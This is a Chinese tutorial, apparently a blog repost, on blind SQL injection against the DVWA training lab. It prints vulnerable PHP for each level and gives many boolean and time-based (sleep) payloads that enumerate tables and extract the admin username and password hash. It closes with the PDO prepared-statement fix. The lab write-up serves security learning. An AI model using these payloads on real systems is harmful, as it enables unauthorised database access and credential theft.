DVWA------SQL Injection (Blind)(SQL盲注)

这篇具有很好参考价值的文章主要介绍了DVWA------SQL Injection (Blind)(SQL盲注)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、SQL 盲注

1.简介

2.分类

3.盲注测试思路

二、SQL Injection (Blind)

1.LOW

1.1代码审计

1.2漏洞利用

2.medium

3.high

4.Impossible


一、SQL 盲注

1.简介

        SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

2.分类

  • 基于布尔的盲注: 即可以根据返回页面判断条件真假的注入;
  • 基于时间的盲注: 即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
  • 基于报错的盲注: 即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;

3.盲注测试思路

1.对于基于布尔的盲注,通过构造真or假判断条件(数据库各项信息取值的大小比较, 如:字段个数,字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…), 将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果 (True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注 响应从True<–>False发生变化的转折点。

2.对于基于时间的盲注,通过构造真or假判断条件的sql语句, 且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求, 观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。

3.对于基于报错的盲注,搜寻查看网上部分Blog,基本是在rand()函数作为group by的字段进行联用的时候会违反Mysql的约定而报错。rand()随机不确定性,使得group by会使用多次而报错。
盲注渗透测试流程

1.判断是否存在注入,注入的类型
2.猜解当前数据库名称
3.猜解数据库中的表名
4.猜解表中的字段名
5.获取表中的字段值
6.验证字段值的有效性
7.获取数据库的其他信息:版本、用户…

常用判断ID

   1
   '
   1 and 1=1 #
   1 and 1=2 #
   1' and 1=1 #
   1' and 1=2 #
   1' or '1' = '1 #
   1' or '1' = '2 #

二、SQL Injection (Blind)

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

1.LOW

1.1代码审计

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?> 

代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞;
同时SQL语句查询返回的结果只有两种:
存在:User ID exists in the database;不存在:User ID is MISSING from the database;
单引号注入

$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。

1.2漏洞利用

a基于布尔的盲注:

a.1判断是否存在注入,注入是字符型还是数字型

若1' and 1=1 #        //存在exists
1' and 1=2 #       //不存在missing
存在字符型注入

若1 and 1=1 #        //存在exists
1 and 1=2 #      //存在exists
这两个都是存在,不是数字型注入

 输入1' and 1=1# 实际后台执行,返回存在。

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#';

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

  输入1' and 1=2# 实际后台执行,返回不存在。

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2#';

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

说明存在字符型的SQL盲注。

a.2猜解当前的数据库名称
猜解数据库名,首先要猜解数据库名的各个属性,然后挨个猜解字符。
数据库名称的属性:字符长度字符组成的元素(字符/数字/下划线/…)

                                元素的位置(首位/第一位/…/末位)

2.1)判断数据库名称长度(二分法思维)

1' and length(database())>10 #          //missing
1' and length(database())>5 #           //missing
1' and length(database())>3 #          //exists
1' and length(database())=4 #         //exists
说明数据库名称长度为4个字符
SELECT first_name, last_name FROM users WHERE user_id = '1' and length(database())=4 # ';

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 得出该数据库名称长度为4个字符。

2.2) 判断数据库名称的字符组成元素

利用substr()函数从给定字符串中,从指定位置开始截取指定长度的字符串,分离出数据库名称的位置,并分别转换为ASCII,与对应的ASCII值比较大小,找到值相同的字符。
mysql数据库中的字符串函数substr()的参数含义。
用法:
substr(string, start, length);
string为字符串;
start为起始位置;
length为长度。
注意:mysql中substr()的start是从1开始的,而不是0

1' and ascii(substr(database(),1,1))>50 #             //exists
1' and ascii(substr(database(),1,1))=100 #           //exists
第一个字符为:100--->d
1' and ascii(substr(database(),2,1))=118 #            //exists
第二个字符为:118--->v
1' and ascii(substr(database(),3,1))=119 #           //exists
第三个字符为:119--->w
1' and ascii(substr(database(),4,1))=97 #            //exists
第四个字符为:97--->a      
SELECT first_name, last_name FROM users WHERE user_id = '1' and ascii(substr(database(),4,1))=97 # ';

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 数据库名称为dvwa

a.3猜解数据库中的表名
数据库中表的属性:表的个数表的名字长度表的名字组成元素

3.1) 首先猜解数据库中表的数量:

对于Mysql,DBMS数据库管理系统—>information_schema库—>tables表 —>table_schema、table_name、table_rows…字段。
输入:

1' and (select count(table_name) from information_schema.tables where table_schema=database()) >10#    //missing
1' and (select count (table_name) from information_schema.tables where table_schema=database())=1 #     //missing
1' and (select count(table_name) from information_schema.tables where table_schema=database()) =2#     //exists
说明dvwa中有两个表
SELECT first_name, last_name FROM users WHERE user_id = '1' and (select count(table_name) from information_schema.tables where table_schema=database()) =2# ';

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

3.2.) 表名称的长度:
1.查询列出当前连接数据库下的所有表名称
select table_name from information_schema.tables where table_schema=database()#
2.列出当前连接数据库中的第1个表名称
select table_name from information_schema.tables where table_schema=database() limit 0,1#
3.以当前连接数据库第1个表的名称作为字符串,从该字符串的第一个字符开始截取其全部字符
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1) #
4.计算所截取当前连接数据库第1个表名称作为字符串的长度值
length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))#
5.将当前连接数据库第1个表名称长度与某个值比较作为判断条件,联合and逻辑构造特定的sql语句进行查询,根据查询返回结果猜解表名称的长度值
1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #

limit子句可以被用于强制 Select语句返回指定的记录数。和subtsr不同,limit是从0开始的。
输入:

一定要给select整个语句加上括号括起来,即length((select xxx)) 或substr((select xxx))
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #       //missing
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #       //exists
//说dvwa中第一个表的表名长度为9个字符
SELECT first_name, last_name FROM users WHERE user_id = '1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #';

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

3.3) 表名称的字符组成:(分别猜解dvwa中第一个表的表名称的第1/2/3/…/9个字符)
第一个表:

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #     //missing
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #   //exists

第一个字符:103—>g
依次猜解其他字符:guestbook

第二个表:

查看字符长度

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))>3 #    //exists
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=5 #   //exists
//说dvwa中第二个表的表名长度为5个字符

 第二个表的第一个字符为:117—>u
依次猜解其他字符:users

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>88 #   //exists
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117 #

a.4猜解表中的字段名
表中的字段名属性:表中的字段数目某个字段名的字符长度字段的字符组成以及位置; 某个字段的全名匹配
4.1) 猜解users表的字段数目:
判断[dvwa库-users表]中的字段数目
输入:

1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')>10 #       //missing
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8  #       //exist
说明dvwa.users表中有8个字段

4.2)猜解user表中的字段长度:

1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=3 #       //missing
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 #       //exist
说明users表的第一个字段为7个字符长度

4.3) 数据库中的字段名称
采用二分法,即可猜解出所有字段名。按照常规流程,从users表的第1个字段开始,对其猜解每一个组成字符, 获取到完整的第1个字段名称…然后是第2/3/…/8个字段名称,首先获取几个包含关键信息的字段,如:用户名、密码…
用户名:user/username/uname/u_name/name/…
密码:password/pass_word/pwd/pass/…

1’ and (select count( * ) from information_schema.columns where table_schema=database() and table_name=’users’ and column_name=’user’)=1 #    //exists   
说明dvwa.users表存在user字段

1’ and (select count( * ) from information_schema.columns where table_schema=database() and table_name=’users’ and column_name=’password’)=1 #  //exists
说明dvwa.users表存在password字段

a.5获取表中的字段值(数据):
5.1) 表中字段的长度

1' and length(substr((select user from users limit 0,1),1))>10 #//missing
1' and length(substr((select user from users limit 0,1),1))=5 # //exists
#说明dvwa.users表的user的第1条记录长5个字符

 dvwa.users表的user的第1条记录长5个字符

1' and length(substr((select password from users limit 0,1),1))>10 #//exist	
1' and length(substr((select password from users limit 0,1),1))>40 #//missin
1' and length(substr((select password from users limit 0,1),1))=32 #//exists

dvwa.users表的password的第1个字段长32字符(字符长32位,不是明文加密,猜测为md5加密,手工猜测几乎不可能)

5.2) 表中字符的组成元素

1.第一种方式:用二分法依次猜解user/password字段中每组字段值的每个字符组成。
user字段-第i组取值、第n个字符:
1’ and ascii(substr((select user from users limit i-1,1),n,1))=xxx #

password字段-第i组取值、第n个字符:
1’ and ascii(substr((select password from users limit i-1,1),n,1))=xxx #

第二种方式:猜测去碰撞完整字段值的全名。

1’ and substr((select user from users limit 0,1),1)=’admin’   # //exists
1’ and (select count( * ) from users where user=’admin’)=1    # //exists
说明user字段的第一组取值为:admin

1’ and (select count( * ) from users where user=’admin’ and password=’5f4dcc3b5aa765d61d8327deb882cf99’)=1 #//exists
说明password字段的第一组取值为:5f4dcc3b5aa765d61d8327deb882cf99–md5—>password

账号admin 密码password

b基于时间的盲注:

         即不能根据页面返回内容判断 任何 信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
        对于基于时间的盲注,通过构造真or假判断条件的sql语句, 且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求, 观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。

b.1判断是否存在注入,注入是字符型还是数字型

输入1' and sleep(5) #  感觉到明显延迟;1'没报错,所以sleep(5)执行
输入1 and sleep(5) #  没有延迟;1报错所以sleep(5)没执行

说明存在 字符型 的基于时间的盲注。

b.2猜解当前数据库名
首先猜解数据名的长度:

if(expr1,expr2,expr3)函数:
如果 expr1 是TRUE ,则 if()的返回值为expr2; 否则返回值则为 expr3。if() 的返回值为数字值或字符串值
1' and if(length(database())=1,sleep(5),1) # 没有延迟
1' and if(length(database())=2,sleep(5),1) # 没有延迟
1' and if(length(database())=3,sleep(5),1) # 没有延迟
1' and if(length(database())=4,sleep(5),1) # 明显延迟

说明数据库名长度为4个字符。

接着采用二分法猜解数据库名组成: 

1' and if(ascii(substr(database(),1,1))=50,sleep(5),1)# 没有延迟
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# 明显延迟… d
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)# 明显延迟… v
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)# 明显延迟… w
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)# 明显延迟… a

得到数据库名称为dvwa

b.3猜解数据库中的表名
表的数量:

1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)      # 没有延迟
1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)      # 明显延迟

说明数据库中有两个表。

表名长度:

1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=3,sleep(5),1) # 没有延迟…
1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9,sleep(5),1) # 明显延迟
1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5,sleep(5),1) # 明显延迟

说明第一个表名的长度为9个字符。第二个表名长度5个字符。

表名(guestbook)

1' and if(ascii(substr((select table_name  from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103,sleep(5),1)#        //g
1' and if(ascii(substr((select table_name  from information_schema.tables where table_schema='dvwa' limit 0,1),9))=107,sleep(5),1)#       //k

 (users)

1' and   if(ascii(substr((select table_name  from information_schema.tables where table_schema='dvwa' limit 1,1),1))=117,sleep(5),1)#   明显延迟 u

b.4.猜解表中的字段名

首先猜解表中字段的数量:

1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name= 'users')=5,sleep(5),1) #    没有延迟
1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name= 'users')=8,sleep(5),1) #    明显延迟

说明users表中有8个字段。

接着猜解字段名长度:

1' and if(length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=5,sleep(5),1) # 没有延迟…
1' and if(length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7,sleep(5),1) # 明显延迟

说明users表的第一个字段长度为7个字符。

字段的名称:

1' and   if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117,sleep(5),1)#     //u

字段值:

id=1' and if(ascii(substr((select user from users limit 0,1),1,1))=97,sleep(5),1)#   //a

我们可以用bp来爆破猜解出数据库的名字

url后面输入

id=1' and substr(database(),1,1)='a'--+&Submit=Submit#  //第一个字母
id=1' and substr(database(),2,1)='a'--+&Submit=Submit#   //第二个字母

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维 爆破出来为d,依次猜解后面三个字母为vwa,数据库为dvwa

判断dvwa库下有几张表

id=1' and (select count(*) from information_schema.tables where table_schema=database())=1--+&Submit=Submit# 

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

判断两张表的长度 

id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1--+&Submit=Submit# //第一张表

id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=1--+&Submit=Submit#   //第二张表

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 第一张表长度为9   第二张表长度为5

判端dvwa库下第一张表的第一个字母  为g

id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a'--+&Submit=Submit#  //第一张第一个

id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='a'--+&Submit=Submit#  //第一张第二个

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='a'--+&Submit=Submit#  //第二张第一个

id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1)='a'--+&Submit=Submit#  //第二张第二个

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 依次猜解出第一张表为guestbook,第二张表为users

判断users表下有几个字段

id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=1--+&Submit=Submit#

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 所以users表下有8个字段

判断users表下第一个字段的长度

id=1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1--+&Submit=Submit#

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 所以users表下第一个字段的长度为7,按照此方法依次猜解出所有地段的长度。

判断users表下第一个字段的第一个字母

id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='a'--+&Submit=Submit#  //第一个字段第一个字母

id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)='a'--+&Submit=Submit#   //第一个字段第二个字母

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 查到了两个有用的字段user  password

判断user字段下面有多少个值  5个

id=1' and (select count(*) from users)=5--+&Submit=Submit#

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 判断user字段的第一个值的第一个字母

id=1' and substr((select user from users limit 0,1),1,1)='a'--+&Submit=Submit# 

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 密码是采用md5加密,要么自己猜,要么靠sqlmap。

2.medium

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

源代码

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?> 

我们发现只能去选择1到5的数字,并且在选择后在url上面看不到我们提交上去的东西,因为这里我们输入的数字是以POST的方式提交到了后台,查看源代码可知,这里对id进行了一定的处理,会将我们输入的单引号给转义到,所以这里就只能为数字型注入或者宽字节注入了。

bp抓包

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

Submit=Submit&id=1 and 1=1# #exists
Submit=Submit&id=1 and 1=2# #MISSING

 判断为字符型注入,之后的方法跟low级别就是一模一样了,这里我们介绍一种新方法,时间盲注,他其实也属于Boolena盲注,这里我们已经判断为数字型注入。

 这里我们用到了HackBar插件,它的功能类似于地址栏,但是它里面的数据不受服务器的相应触发的重定向等其它变化的影响。

我们下载HackBar V2这一个, HackBar需要收费。

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

我们判断当前数据库的长度是否为4,如果是,则查询休眠5秒,如果不是,则查询1,不休眠。

Submit=Submit&id=1 and if(length(database())=4,sleep(5),1)#

我们发现页面确实休眠了5秒,所以判断当前数据库长度为4。

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

判断当前数据库的第一个字母,因为这里单引号被转义了,所以我们将字母转为ascii码进行查找,页面休眠了5秒,查找ascii码表,100对应的字母为d,所以判断当前数据库的第一个字母为d,按照此方法依次查找,判断当前数据库为dvwa,后面的过程与low级别基本相似。

Submit=Submit&id=1 and if(ascii(substr(database(),1,1))=100,sleep(5),1) #

 

sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 3.high

查看源代码可知,我们输入id时,会自动跳转到另一个页面,再就是在sql语句后面加了一个limit函数。

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?> 

 sql injection (blind),DVWA,sql,安全,web安全,数据库,运维

 

4.Impossible

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?> 

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入;

同时只有返回的查询结果数量为1时,才会输出。文章来源地址https://www.toymoban.com/news/detail-577563.html

到了这里,关于DVWA------SQL Injection (Blind)(SQL盲注)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 7、DVWA——SQL盲注

      盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 普通注入与盲注的区别:   普通注入是可以根据报错提示,进行sql语句注入从而,直接爆出我们想要的信息,

    2024年02月08日
    浏览(31)
  • DVWA——SQL注入+盲注

    目的:执行特定sql语句,获得其他相关内容。 攻击方式:动态构造SQL语句 影响:数据库的脱裤、修改、甚至影响到操作系统。 漏洞原理:直接使用原始sql语句,没有代码审查 漏洞利用: 步骤1:判断是否存在注入漏洞: 步骤2:判断当前表字段个数?:通过order by 排序字段

    2024年02月07日
    浏览(49)
  • DVWA——SQL盲注(全等级)

    SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。

    2023年04月12日
    浏览(34)
  • DVWA之sql注入——盲注

    1.1 布尔盲注 布尔很明显的Ture跟Fales,也就说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错 信息。 1.判断是否存在注入,注入的类型 不管输入框输入为何内容,页面上只会返回以下2种情形的提示: 满足查询条件则返回\\\"User ID exists in the database.\\\",不满足查询

    2024年02月05日
    浏览(54)
  • DVWA 之 SQL注入(非盲注)

    步骤: 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 输入1,查询成功: 输入1’and ‘1’ =’2,查询失败,返回结果为空: 输入1’or ‘1 ’=’1,查询

    2024年02月04日
    浏览(43)
  • DVWA-Command Injection

    各种脚本语言都有可以调用系统命令的方法,如PHP语言中的system()、exec()等命令执行函数,可以执行系统命令,命令注入攻击,是指攻击者构造特殊的语句,将系统命令拼接到正常的用户输入,进而传递到命令执行函数的参数中,造成系统命令被执行的攻击方式。 安全漏洞从

    2024年02月08日
    浏览(27)
  • Hack The Box -SQL Injection Fundamentals Module详细讲解中文教程

    数据库介绍............................................................................................................... 3 数据库管理系统(DBMS)介绍........................................................................... 3 数据库的类型..................................................................................................

    2024年02月04日
    浏览(30)
  • SQL运行报错:java.sql.SQLException: sql injection violation, syntax error: syntax error, expect ‘)‘, pos

    批量插入的sql,运行时报错 检查sql,检查了几遍,没什么问题 后来发现,当插入的数据为空时,也会报    expect \\\')\\\',   错误

    2024年02月15日
    浏览(51)
  • 解决Cause: java.sql.SQLException: sql injection violation, dbType mysql ... token IDENTIFIER deleted错误

    本文不仅帮你解决错误,还帮你分析错误的原因👇👇 今天写好 创建数据源 的接口,并启动项目后,通过 Knife4j 调用单接口,但保出如下图错误: 于是,查看后端输出详细的错误信息,如下所示: 由于篇幅有限,没有粘贴出全部的错误信息。 由于错误信息很多,我们只需

    2024年02月04日
    浏览(42)
  • SourceCodester Online Tours & Travels Management System payment.php sql injection

    path : admin/operations/payment.php Abstract: Line 43 of payment.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is use

    2024年02月19日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包